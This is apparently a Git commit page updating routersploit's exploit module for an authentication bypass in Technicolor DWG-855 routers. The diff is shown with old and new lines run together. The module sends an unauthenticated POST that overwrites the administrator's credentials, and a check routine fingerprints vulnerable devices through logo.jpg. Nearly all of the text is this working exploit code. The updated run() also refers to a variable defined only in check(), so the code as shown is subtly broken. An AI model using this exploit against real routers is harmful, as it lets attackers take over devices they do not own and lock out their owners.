Skip to content

R
routersploit
Commit 2d2b24c2 by 0BuRner Committed by GitHub
Options

Update dwg855_authbypass.py

parent ca1f5377
Showing with 29 additions and 15 deletions
routersploit/modules/exploits/technicolor/dwg855_authbypass.py
import base64 import binascii
from routersploit import( from routersploit import (
exploits, exploits,
print_success, print_success,
print_error, print_error,
print_status,
sanitize_url, sanitize_url,
http_request, http_request,
mute
) )
class Exploit(exploits.Exploit): class Exploit(exploits.Exploit):
""" """
Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability. Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
...@@ -16,10 +17,10 @@ class Exploit(exploits.Exploit): ...@@ -16,10 +17,10 @@ class Exploit(exploits.Exploit):
""" """
__info__ = { __info__ = {
'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.', 'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.\nNOTE2: run \"check\" after runing module to see if it worked.', 'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
'authors': [ 'author': [
'JPaulMora', # vulnerability discovery 'JPaulMora <https://JPaulMora.GitHub.io>',
'JPaulMora <https://JPaulMora.GitHub.io>', # routersploit module # vulnerability discovery,routersploit module
], ],
'references': [ 'references': [
'No references, at time of write its a 0day. Check my page though I probably wrote something about it.', 'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
...@@ -35,24 +36,35 @@ class Exploit(exploits.Exploit): ...@@ -35,24 +36,35 @@ class Exploit(exploits.Exploit):
npass = exploits.Option('rpass', 'Overwrite old password with.. ') npass = exploits.Option('rpass', 'Overwrite old password with.. ')
def run(self): def run(self):
print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port)) url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'} headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {"HttpUserId":self.nuser, "Password":self.npass, "PasswordReEnter":self.npass, "RestoreFactoryNo":"0x00"} data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
response = http_request(method="POST", url=url, headers=headers, data=data) response = http_request(method="POST", url=url, headers=headers, data=data)
return ""
@mute if response is None:
print_error("Target didn't answer request.")
elif vulnresp in response.text.encode('utf-8'):
print_success("Credentials changed!")
elif response.status_code == 401:
print_error("Target answered, denied access.")
else:
print_error("Unknown error, submit an issue.")
def check(self): def check(self):
url = sanitize_url("{}:{}/RgConnect.asp".format(self.target, self.port))
# The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
vulnresp = binascii.unhexlify('114475636b7900') # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
authorization = 'Basic {}'.format(base64.b64encode(self.nuser + ':' + self.npass))
headers = {'User-Agent': user_agent, headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive', 'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate', 'Accept-Encoding': 'gzip, deflate',
'Authorization': authorization, 'Authorization': 'Og==', # this is base64(":")
'Cache-Control': 'no-cache', 'Cache-Control': 'no-cache',
'Connection': 'close'} 'Connection': 'close'}
...@@ -60,7 +72,9 @@ class Exploit(exploits.Exploit): ...@@ -60,7 +72,9 @@ class Exploit(exploits.Exploit):
if response is None: if response is None:
return False # target is not vulnerable return False # target is not vulnerable
if response.status_code == 401: elif vulnresp in response.text.encode('utf-8'):
return True # device is vulnerable
elif response.status_code == 401:
return False # target is not vulnerable return False # target is not vulnerable
else: else:
return True # device is vulnerable return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment